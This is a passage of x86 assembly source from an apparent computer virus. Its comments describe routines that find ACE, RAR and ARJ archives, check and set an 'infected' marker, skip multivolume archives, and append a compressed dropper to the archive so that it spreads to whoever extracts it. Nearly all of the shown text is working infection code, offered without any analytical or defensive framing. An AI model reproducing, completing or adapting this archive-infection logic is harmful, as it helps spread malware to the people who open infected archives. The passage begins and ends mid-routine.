movzx ecx,word ptr [ebx-0002h] ;ecx=bytes to read

movzx esi,word ptr [ebx-0004h] ;esi=file pos

; now, i will read datas

mov edx,[ebp+__iSFX_fMemory] ;allocated place

mov ebx,[ebp+__iSFX_fHandle]

call __MyReadFile ;i can't check error!

; prepare to scan

mov edi,[ebp+__iSFX_fMemory]

mov ebx,edi

add ebx,ecx ;end of memory buffer


cmp edi,ebx

ja __iSFX_search_1

; search archive's signatures

lea esi,[ebp+RAR_Magic] ;no, esi=RAR_Magic

mov ecx,RAR_Magic_Length ;and its size

cmp [ebp+__iSFX_nCompare],00000004h

jae __iSFX_s2_continue ;is it really RAR ?

lea esi,[ebp+ACE_Magic] ;esi=ACE_Magic

mov ecx,ACE_Magic_Length ;and its size



rep cmpsb ;compare magics

jnz __iSFX_search_2 ;shit, we must search on other place

; position on header's start

sub edi,RAR_Magic_Length

cmp [ebp+__iSFX_nCompare],00000004h

jae __iSFX_h_read

sub edi,2*ACE_Magic_Length-RAR_Magic_Length


; check multivolume flag

cmp [ebp+__iSFX_nCompare],00000004h

jae __iSFX_mf_rar

test word ptr [edi+ACEhHeadFlags-ACE_h_struct],2048

jmp __iSFX_mf_finish


test word ptr [edi+RARFileFlags-RARSignature],0001h


jnz __iSFX_sEnd

; call "child" functions, set certain input parameters

mov eax,[ebp+__iSFX_fHandle]

mov [ebp+__iACR_fHandle],eax ;modify handle

mov [ebp+__iACR_Type],__iACR_tRAR ;yeah, RAR archive

cmp [ebp+__iSFX_nCompare],00000004h

jae __iSFX_cc_finish

mov [ebp+__iACR_Type],__iACR_tACE ;yeah, ACE archive


mov ebx,[ebp+__iSFX_fHandle] ;check whether SFX

call __get_archive_infected ;archive has been

jc __iSFX_fClose ;infected

call __iACR_child_function ;call main function

jmp __iSFX_finish ;to infect ACE or RAR


call __iSFX_fClose




mov ebx,[ebp+__iSFX_fHandle]

call __MyCloseFile




;哪拇 infection in ACE, RAR archivez 媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?


;This function infects ACE and RAR archivez. Unfortunately

;I can't my dropper place inside archive 'cause if archive

;is solid type resulting archive won't okay. Yes, this was

;shock for me. But if archive isn't solid all will be okay

;althrough this method is not support here. So, my dropper

;is compressed but in the end of file.


; input: filename_ptr ... pointer to an ARJ's filename

; NewARJ struc ... has been filled? I dont know!


; output: nothing


__iACR_fHandle dd 00000000h ;archive's handle

__iACR_dHandle dd 00000000h ;dropper's handle

__iACR_dMemory dd 00000000h ;dropper's body


__iACR_Type dd 00000000h ;ACE or RAR ?

__iACR_tACE equ 00h ;ACE signature

__iACR_tRAR equ 01h ;RAR signature


infect_ACE: mov [ebp+__iACR_Type],__iACR_tACE ;yeah, ACE archive

jmp infect_ACR

infect_RAR: mov [ebp+__iACR_Type],__iACR_tRAR ;yeah, RAR archive

; here, common functions is starting...


; check whether dropper exists

mov eax,[ebp+__iACR_Type] ;get archive type

imul eax,size AProgram

cmp [ebp+eax+NewACE.dropper],00000000h

jz __iACR_finish ;does dropper exists ?

; open archive file

mov edx,[ebp+filename_ptr]

call __MyOpenFile

jc __iACR_finish

mov [ebp+__iACR_fHandle],eax

; check whether archive has been infected

mov ebx,[ebp+__iACR_fHandle]

call __get_archive_infected

jc __iACR_fClose

; read archive header

cmp dword ptr [ebp+offset __iACR_Type],__iACR_tACE

jnz __iACR_rar_1

lea edx,[ebp+ACE_h_struct] ;destination place

mov ecx,ACENeededBytes

jmp __iACR_end_1


lea edx,[ebp+RARSignature] ;destination place

mov ecx,RARSignature_Length + /

RARNeededBytes ;number of bytes to read


xor esi,esi

mov ebx,[ebp+__iACR_fHandle]

call __MyReadFile

jc __iACR_fClose

; check archive's header

cmp dword ptr [ebp+offset __iACR_Type],__iACR_tACE

jnz __iACR_rar_2

cmp dword ptr [ebp+ACEhSignature],'CA**'

jnz __iACR_fClose ;the 1st part of sign

cmp word ptr [ebp+ACEhSignature+00000004h],'*E'

jnz __iACR_fClose ;the 2nd part

test word ptr [ebp+ACEhHeadFlags],2048

jnz __iACR_fClose ;multivolume flag ?

jmp __iACR_end_2


cmp dword ptr [ebp+RARSignature],'!raR'

jnz __iACR_fClose

cmp word ptr [ebp+RARSignature+00000004h],071Ah

jnz __iACR_fClose

test word ptr [ebp+RARFileFlags],0001h

jnz __iACR_fClose ;multivolume flag ?


; open dropper file


mov edx,[ebp+__iACR_Type] ;get archive type

imul edx,size AProgram

mov edx,[ebp+edx+NewACE.dropper]

or edx,edx ;once again test:

jz __iACR_finish ;does dropper exists ?

call __MyOpenFile

jc __iACR_fClose

mov [ebp+__iACR_dHandle],eax

; get dropper's file size

mov ebx,[ebp+__iACR_dHandle]

call __MyGetFileSize

mov ecx,eax

; allocate memory for dropper's file body

call malloc

mov [ebp+__iACR_dMemory],eax

; read whole dropper's body

mov edx,[ebp+__iACR_dMemory];destination buffer

xor esi,esi ;file position

mov ebx,[ebp+__iACR_dHandle];dropper's handle

call __MyReadFile

jc __iACR_dClose

; get archive file size

mov ebx,[ebp+__iACR_fHandle]

call __MyGetFileSize

mov esi,eax

; "update" archive file by my dropper

cmp dword ptr [ebp+offset __iACR_Type],__iACR_tACE

jnz __iACR_rar_3

movzx eax,word ptr [edx+ACEhHeadSize-ACE_h_struct]

add eax,00000004h

jmp __iACR_end_3


movzx eax,word ptr [edx+RARHeaderSize-RARSignature]

add eax,RARSignature_Length


add edx,eax ;header take away

sub ecx,eax ;without main header, please

mov ebx,[ebp+__iACR_fHandle]

call __MyWriteFile ;write my dropper, uaaah :)

; archive has been infected

mov ebx,[ebp+__iACR_fHandle]

call __set_archive_infected


mov ebx,[ebp+__iACR_dHandle]

call __MyCloseFile


mov eax,[ebp+__iACR_dMemory]

call mdealloc


mov ebx,[ebp+__iACR_fHandle]

call __MyCloseFile



;哪拇 infection in ARJ archivez 媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪


;This function infect ARJ archivez by my prepared dropper.

;Dropper is compressed by ARJ (four method without store).


; input: filename_ptr ... pointer to an ARJ's filename

; NewARJ struc ... 's been filled? I dont know!


; output: nothing


__iARJ_fHandle dd 00000000h ;archive's handle

__iARJ_fFiles dd 00000000h ;number of files

__iARJ_dHandle dd 00000000h ;dropper's handle

__iARJ_dMemory dd 00000000h ;dropper's file body



xor eax,eax

mov [ebp+__iARJ_fFiles],eax

; check whether dropper exists

cmp [ebp+NewARJ.dropper],00000000h

jz __iARJ_fi